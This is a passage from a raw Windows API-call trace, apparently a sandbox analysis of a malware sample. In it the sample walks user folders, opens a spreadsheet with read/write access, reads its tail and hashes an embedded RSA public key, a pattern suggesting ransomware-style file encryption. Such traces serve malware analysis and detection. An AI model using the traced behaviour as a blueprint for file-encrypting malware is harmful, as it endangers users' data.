ftLastWriteTime.dwLowDateTime=0x5616fca0, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Internet Explorer", cAlternateFileName="INTERN~1")) returned 0 [0205.757] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.758] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b671e0 [0205.758] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\") returned="Sun\\" [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x60) returned 0x384580 [0205.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\") returned="LocalLow\\" [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x50) returned 0x32c38e8 [0205.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\") returned="AppData\\" [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.758] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.758] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.758] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.758] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.759] PathFindFileNameW (pszPath="") returned="" [0205.759] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0205.759] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\LocalLow\\Sun\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.759] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0x68cb4a40, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0x68cb4a40, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.760] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 1 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x70) returned 0x3b67618 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa6) returned 0x3b2fd8 [0205.760] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x68cb4a40, ftCreationTime.dwHighDateTime=0x1d2e627, ftLastAccessTime.dwLowDateTime=0xa1dc2570, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1dc2570, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Java", cAlternateFileName="")) returned 0 [0205.760] FindClose (in: hFindFile=0x32ef1f8 | out: hFindFile=0x32ef1f8) returned 1 [0205.760] PeekMessageW (in: lpMsg=0x39cff08, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cff08) returned 0 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eed98 [0205.760] PeekMessageW (in: lpMsg=0x39cfb74, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x39cfb74) returned 0 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x820) returned 0x3b15070 [0205.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\") returned="F RRWNCvdbx\\" [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0205.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\") returned="fZpil8Uu6QzTlWoWB\\" [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0100 [0205.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\") returned="Documents\\" [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.760] PathFindFileNameW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\") returned="5p5NrGJn0jS HALPmcxz\\" [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.760] PathFindFileNameW (pszPath="C:\\Users\\") returned="Users\\" [0205.760] PathFindFileNameW (pszPath="C:\\") returned="C:\\" [0205.760] PathFindFileNameW (pszPath="") returned="" [0205.760] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0205.760] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\*", lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd39b2240, ftCreationTime.dwHighDateTime=0x1d5d978, ftLastAccessTime.dwLowDateTime=0xc572fc40, ftLastAccessTime.dwHighDateTime=0x1d5e0b4, ftLastWriteTime.dwLowDateTime=0xc572fc40, ftLastWriteTime.dwHighDateTime=0x1d5e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x32ef1f8 [0205.762] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xd39b2240, ftCreationTime.dwHighDateTime=0x1d5d978, ftLastAccessTime.dwLowDateTime=0xc572fc40, ftLastAccessTime.dwHighDateTime=0x1d5e0b4, ftLastWriteTime.dwLowDateTime=0xc572fc40, ftLastWriteTime.dwHighDateTime=0x1d5e0b4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0205.762] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xcfa08c30, ftCreationTime.dwHighDateTime=0x1d5d8a0, ftLastAccessTime.dwLowDateTime=0xba4b15b0, ftLastAccessTime.dwHighDateTime=0x1d5dcb2, ftLastWriteTime.dwLowDateTime=0xba4b15b0, ftLastWriteTime.dwHighDateTime=0x1d5dcb2, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="dDSiV9mIqla-", cAlternateFileName="DDSIV9~1")) returned 1 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77968 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xb0) returned 0x3b77a20 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x16c) returned 0x340df0 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3218d0 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef1c0 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6be20 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x3217c0 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef128 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2eee30 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef4b8 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xa0) returned 0x3b6bc28 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321b78 [0205.762] FindNextFileW (in: hFindFile=0x32ef1f8, lpFindFileData=0x39cfba4 | out: lpFindFileData=0x39cfba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x71493950, ftCreationTime.dwHighDateTime=0x1d5deec, ftLastAccessTime.dwLowDateTime=0x31368890, ftLastAccessTime.dwHighDateTime=0x1d5e58b, ftLastWriteTime.dwLowDateTime=0x31368890, ftLastWriteTime.dwHighDateTime=0x1d5e58b, nFileSizeHigh=0x0, nFileSizeLow=0x8ecb, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="eGIHThgcy2.ods", cAlternateFileName="EGIHTH~1.ODS")) returned 1 [0205.762] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x90) returned 0x2ef258 [0205.763] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xd6) returned 0x3a67c8 [0205.763] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\eGIHThgcy2.ods") returned=".ods" [0205.763] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\fZpil8Uu6QzTlWoWB\\F RRWNCvdbx\\eGIHThgcy2.ods" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\documents\\fzpil8uu6qztlwowb\\f rrwncvdbx\\egihthgcy2.ods"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x63c [0205.763] GetFileSizeEx (in: hFile=0x63c, lpFileSize=0x39cfb40 | out: lpFileSize=0x39cfb40*=36555) returned 1 [0205.763] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3d10000 [0205.765] SetFilePointerEx (in: hFile=0x63c, liDistanceToMove=0x8ea5, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0205.765] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x39cfb78, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb78*=0x26, lpOverlapped=0x0) returned 1 [0205.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.767] ReadFile (in: hFile=0x63c, lpBuffer=0x3d10000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x39cfb70, lpOverlapped=0x0 | out: lpBuffer=0x3d10000*, lpNumberOfBytesRead=0x39cfb70*=0x8ecb, lpOverlapped=0x0) returned 1 [0205.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.767] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1da) returned 0x3310808 [0205.767] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.768] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAzreoxV\\/rFyuzQiS8FVch\\\\nl2aXpbB5JcMM5AxRw5+tlE02crMcjYVLccEgdq+6B\\/f+leyqZrznGzC9HlALY6ax\\\\n8DiWqngroZPMKNWtx53qsHMVqPUQuN5+\\/vyNOGmLt6UhAy4KXILNyTz0MbbQA0N5\\\\nkXP+nuAUxhuU7YkgvdSVpfkYBlwNU1vAIFeEpH153NzhSRH5WxUU8bYbWjLuu+SV\\\\nEai0StF88Faro7++06ADJpsmXItVD04PhzZdSID4HuPUFVh0a9YPw7QXFrf6SmJr\\\\neaA7OZE14mBZtkSAyG0CGZSMx4E517tpdZuLUAdkaocU0Kn6TzqP6nMB+RYPpEeW\\\\nsQIDAQAB\\\\n-----END PUBLIC KEY-----") returned 469 [0205.768] CryptAcquireContextW (in: phProv=0x39cfa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x39cfa50*=0x321958) returned 1 [0205.768] CryptCreateHash (in: hProv=0x321958, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x39cfa58 | out: phHash=0x39cfa58) returned 1 [0205.768] CryptHashData (hHash=0x32ef238, pbData=0x3310808, dwDataLen=0x1da, dwFlags=0x0) returned 1 [0205.768] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x0, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x39cfa54) returned 1 [0205.768] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x11) returned 0x32b3720 [0205.769] CryptGetHashParam (in: hHash=0x32ef238, dwParam=0x2, pbData=0x32b3720, pdwDataLen=0x39cfa54, dwFlags=0x0 | out: pbData=0x32b3720, pdwDataLen=0x39cfa54) returned 1 [0205.769] GetLastError () returned 0x0 [0205.769] CryptDestroyHash (hHash=0x32ef238) returned 1 [0205.769] CryptReleaseContext (hProv=0x321958, dwFlags=0x0) returned 1 [0205.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3310808 | out: hHeap=0x2c0000) returned 1 [0205.769] UuidCreate (in: Uuid=0x39cfa48 | out: Uuid=0x39cfa48) returned 0x0 [0205.769] UuidToStringA (in: Uuid=0x39cfa48, StringUuid=0x39cfa40 | out: StringUuid=0x39cfa40) returned 0x0 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.769] RpcStringFreeA (in: String=0x39cfa40 | out: String=0x39cfa40) returned 0x0 [0205.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c01e0 | out: hHeap=0x2c0000) returned 1 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c01e0 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8ed0) returned 0x3b81690 [0205.769] SetFilePointer (in: hFile=0x63c, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0205.769] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32c0170 | out: hHeap=0x2c0000) returned 1 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x3310808 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x32c0170 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x1e0) returned 0x32eb20 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e5258 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b66858 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea18 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x3b668a0 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea30 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.769] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x24) returned 0x32f7e58 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x158) returned 0x3b75968 [0205.770] RtlReAllocateHeap (Heap=0x2c0000, Flags=0x0, Ptr=0x3b75968, Size=0x218) returned 0x3b7c6a8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x558) returned 0x3b74b68 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f7e58 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b74b68 | out: hHeap=0x2c0000) returned 1 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x32771a8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10) returned 0x32fea78 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x18) returned 0x32b36e0 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x9) returned 0x32fea60 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x3277188 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x10e) returned 0x3b6eec8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x32f9250 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x58) returned 0x32e51f8 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b3720 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x104) returned 0x3b6eb80 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x14) returned 0x32b36c0 [0205.770] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277198 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6eec8 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea78 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3277188 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32fea60 | out: hHeap=0x2c0000) returned 1 [0205.770] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b36e0 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32feaa8 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32f9250 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32e5258 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b7c6a8 | out: hHeap=0x2c0000) returned 1 [0205.771] GetCurrentThreadId () returned 0x600 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75968 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x82) returned 0x3b69db8 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x2c) returned 0x32c0218 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x80) returned 0x321958 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x148) returned 0x336fe98 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3277188 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75a70 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.771] GetCurrentThreadId () returned 0x600 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xeb) returned 0x32b69d8 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x64) returned 0x397d80 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x397d80 | out: hHeap=0x2c0000) returned 1 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32b69d8 | out: hHeap=0x2c0000) returned 1 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75b78 [0205.771] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771a8 | out: hHeap=0x2c0000) returned 1 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4c) returned 0x32c38e8 [0205.771] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771a8 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x100) returned 0x3b75c80 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32feaa8 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9e0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x31b9f0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b780 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b790 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7a0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7b0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea60 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x31b9e0 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x8) returned 0x31b9e0 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x32771c8 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x32771c8 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7c0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7d0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x4) returned 0x3b6b7e0 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0xc) returned 0x32fea78 [0205.772] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x3b6b7d0 | out: hHeap=0x2c0000) returned 1 [0205.772] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, 